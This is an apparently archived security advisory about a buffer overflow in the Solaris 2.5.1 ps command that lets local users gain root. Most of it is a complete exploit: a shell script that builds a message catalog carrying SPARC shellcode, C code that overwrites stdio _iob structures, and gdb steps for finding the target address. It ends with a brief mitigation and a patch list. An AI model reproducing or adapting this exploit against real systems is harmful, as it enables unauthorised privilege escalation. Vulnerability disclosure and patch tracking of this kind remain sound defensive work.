COMMAND

    /usr/bin/ps (/usr/ucb/ps in similar way)

SYSTEMS AFFECTED

    Solaris 2.5.1

PROBLEM

    This info is  same as ps  #4 on Security  Bugware SunOS page  with
    difference that exploit below works on SunOS 5.5.1.

    ps is a program used  to print information about active  processes
    on the system.

    Due to insufficient bounds checking on arguments passed to the  ps
    program, it is  possible to overwrite  the internal data  space of
    this program while it  is executing. This vulnerability  may allow
    local users to gain root privileges.  Under Solaris 2.x there  are
    two distinct vulnerable  versions of ps.   These are installed  by
    default in /usr/bin/ and /usr/ucb/.

    Joe Zbiciak made an exploit for  ps.  This exploit does *not*  use
    the  getopt()/argv[0]  hole.   This  partial  exploit is unique in
    that  it  does  *not*  rely  on  an  executable stack.  Rather, it
    overwrites the  buffer pointers  in _iob[0]  through _iob[2], thus
    inducing  stdio  streams  to  do  the  dirty  work.   Below is the
    complete exploit.

    Incidentally, it appears  that /usr/ucb/ps is  equally succeptable
    to this hole, except the vulnerability is on the -t argument,  and
    the string grokked  by gettext is  different, so the  "ps_expl.po"
    file needs  to be  changed slightly.   Fortunately, "environ"  and
    "proc_link" are pretty much the same.

    A number of you have written saying that the exploit doesn't work.
    The biggest problem is that the exploit relies on a very  specific
    address (which is  putted in the  proc_link variable) in  order to
    work.  The following shortcut seems to work for finding the  value
    for the  bothersome proc_link  variable.   You don't  need to be a
    gdb whiz to do this:

    $ gdb ./ps
    GDB is free software and you are welcome to distribute copies of it
    under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for details.
    GDB 4.16 (sparc-sun-solaris2.4),
    Copyright 1996 Free Software Foundation, Inc...(no debugging symbols found)...
    (gdb) break exit
    Breakpoint 1 at 0x25244
    (gdb) run
    Starting program: /home3/student/im14u2c/c/./ps
    (no debugging symbols found)...(no debugging symbols found)...
    (no debugging symbols found)...Breakpoint 1 at 0xef7545c0
    (no debugging symbols found)...   PID TTY      TIME CMD
      9840 pts/27   0:01 ps
     19499 pts/27   0:10 bash
      9830 pts/27   0:02 gdb

    Breakpoint 1, 0xef7545c0 in exit ()
    (gdb) disassemble exit
    Dump of assembler code for function exit:
    0xef7545c0 <exit>:      call  0xef771408 <_PROCEDURE_LINKAGE_TABLE_+7188>
    0xef7545c4 <exit+4>:    nop
    0xef7545c8 <exit+8>:    mov  1, %g1
    0xef7545cc <exit+12>:   ta  8
    End of assembler dump.
    (gdb)

    The magic  number is  in the  "call" above:  0xef771408.   Anyway,
    exploit.

    --- ps_expl.sh: cut here ---

    #!/bin/sh
    #
    # Exploit for Solaris 2.5.1 /usr/bin/ps
    # J. Zbiciak, 5/18/97
    #

    # change as apropriate
    CC=gcc

    # Build the "replacement message" :-)
    cat > ps_expl.po << E_O_F
    domain "SUNW_OST_OSCMD"
    msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n"
    msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025"
           "\343\150\220\013\200\016\222\003\240\014\224\032\200\012"
           "\234\003\240\024\354\073\277\354\300\043\277\364\334\043"
           "\277\370\300\043\277\374\202\020\040\073\221\320\040\010"
           "\220\033\300\017\202\020\040\001\221\320\040\010"
    E_O_F

    msgfmt -o /tmp/foo ps_expl.po

    # Build the C portion of the exploit
    cat > ps_expl.c << E_O_F

    /*****************************************/
    /* Exploit for Solaris 2.5.1 /usr/bin/ps */
    /* J. Zbiciak,  5/18/97                  */
    /*****************************************/
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    #define BUF_LENGTH      (632)
    #define EXTRA           (256)

    int main(int argc, char *argv[])
    {
            char buf[BUF_LENGTH + EXTRA];
                          /* ps will grok this file for the exploit code */
            char *envp[]={"NLSPATH=/tmp/foo",0};
            u_long *long_p;
            u_char *char_p;
                            /* This will vary depending on your libc */
            u_long *proc_link=0xef771408;
            int i;

            long_p = (u_long *) buf;

            /* This first loop smashes the target buffer for optargs */
            for (i = 0; i < (96) / sizeof(u_long); i++)
                    *long_p++ = 0x10101010;

            /* At offset 96 is the environ ptr -- be careful not to mess it up */
            *long_p++=0xeffffcb0;
            *long_p++=0xffffffff;

            /* After that is the _ctype table.  Filling with 0x10101010 marks the
               entire character set as being "uppercase printable". */
            for (i = 0; i < (BUF_LENGTH-104) / sizeof(u_long); i++)
                    *long_p++ = 0x10101010;

            /* build up _iob[0]  (Ref: /usr/include/stdio.h, struct FILE) */
            *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
            *long_p++ = proc_link;    /* pointer to chars in buffer */
            *long_p++ = proc_link;    /* pointer to buffer */
            *long_p++ = 0x0501FFFF;   /* unbuffered output on stream 1 */
            /* Note: "stdin" is marked as an output stream.  Don't sweat it. :-) */

            /* build up _iob[1] */
            *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
            *long_p++ = proc_link;    /* pointer to chars in buffer */
            *long_p++ = proc_link;    /* pointer to buffer */
            *long_p++ = 0x4201FFFF;   /* line-buffered output on stream 1 */

            /* build up _iob[2] */
            *long_p++ = 0xFFFFFFFF;   /* num chars in buffer */
            *long_p++ = proc_link;    /* pointer to chars in buffer */
            *long_p++ = proc_link;    /* pointer to buffer */
            *long_p++ = 0x4202FFFF;   /* line-buffered output on stream 2 */

            *long_p =0;

            /* The following includes the invalid argument '-z' to force the
               usage msg to appear after the arguments have been parsed. */
            execle("/usr/bin/ps", "ps", "-z", "-u", buf, (char *) 0, envp);
            perror("execle failed");

            return 0;
    }
    E_O_F

    # Compile it
    $CC -o ps_expl ps_expl.c

    # And off we go!
    exec ./ps_expl

    --- EOF ---

SOLUTION

    You should  remove setuid  and non-root  execute permissions until
    you apply patch:

        # chmod 500 /usr/bin/ps /usr/ucb/ps

    The vulnerability in ps is fixed by the following patches:

        OS version      Patch ID
        __________      ________
        SunOS 5.5.1     105050-01
        SunOS 5.5.1_x86 105051-01
        SunOS 5.5       105052-01
        SunOS 5.5_x86   105053-01
        SunOS 5.4       102711-02
        SunOS 5.4_x86   102712-02
        SunOS 5.3       101545-03